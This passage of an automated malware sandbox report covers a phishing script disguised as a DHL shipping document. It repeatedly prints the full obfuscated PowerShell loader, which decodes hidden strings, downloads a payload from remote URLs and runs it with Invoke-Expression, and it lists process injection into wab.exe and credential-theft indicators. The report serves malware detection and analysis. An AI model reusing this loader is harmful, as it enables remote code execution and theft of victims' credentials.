2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe			Jump to behavior

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04586E09 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	10_2_04586E09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	19_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00401806 NtdllDefWindowProc_W,	19_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004018C0 NtdllDefWindowProc_W,	19_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004016FD NtdllDefWindowProc_A,	21_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004017B7 NtdllDefWindowProc_A,	21_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00402CAC NtdllDefWindowProc_A,	22_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00402D66 NtdllDefWindowProc_A,	22_2_00402D66

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF886EEB506	2_2_00007FF886EEB506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF886EEC2B2	2_2_00007FF886EEC2B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0481F1F0	5_2_0481F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0481FAC0	5_2_0481FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0481EEA8	5_2_0481EEA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B37194	10_2_22B37194
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B2B5C1	10_2_22B2B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044B040	19_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0043610D	19_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00447310	19_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044A490	19_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040755A	19_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0043C560	19_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044B610	19_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044D6C0	19_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004476F0	19_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044B870	19_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044081D	19_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00414957	19_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004079EE	19_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00407AEB	19_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044AA80	19_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00412AA9	19_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00404B74	19_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00404B03	19_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044BBD8	19_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00404BE5	19_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00404C76	19_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00415CFE	19_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00416D72	19_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00446D30	19_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00446D8B	19_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00406E8F	19_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00405038	21_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0041208C	21_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004050A9	21_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0040511A	21_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0043C13A	21_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004051AB	21_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00449300	21_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0040D322	21_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0044A4F0	21_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0043A5AB	21_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00413631	21_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00446690	21_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0044A730	21_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004398D8	21_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004498E0	21_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0044A886	21_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0043DA09	21_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00438D5E	21_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00449ED0	21_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0041FE83	21_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00430F54	21_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004050C2	22_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004014AB	22_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00405133	22_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004051A4	22_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00401246	22_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_0040CA46	22_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00405235	22_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004032C8	22_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00401689	22_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00402F60	22_2_00402F60

Found potential string decryption / allocating functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00416760 appears 69 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: DHL Shipping Document Awb & BL.vbs

Initial sample: Strings found which are bigger than 50

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Yara signature match

Source: amsi32_7792.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@31/12@12/3

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

19_2_004182CE

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,

22_2_00410DE1

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,

19_2_00418758

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,

19_2_00413D4C

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,

19_2_0040B58D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Proskriberes.Bet

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\jmoughoe-DMPW3B
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gslda24.jeh.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"

Source: C:\Program Files (x86)\Windows Mail\wab.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7792

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 00000013.00000002.2023090570.00000000038AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet 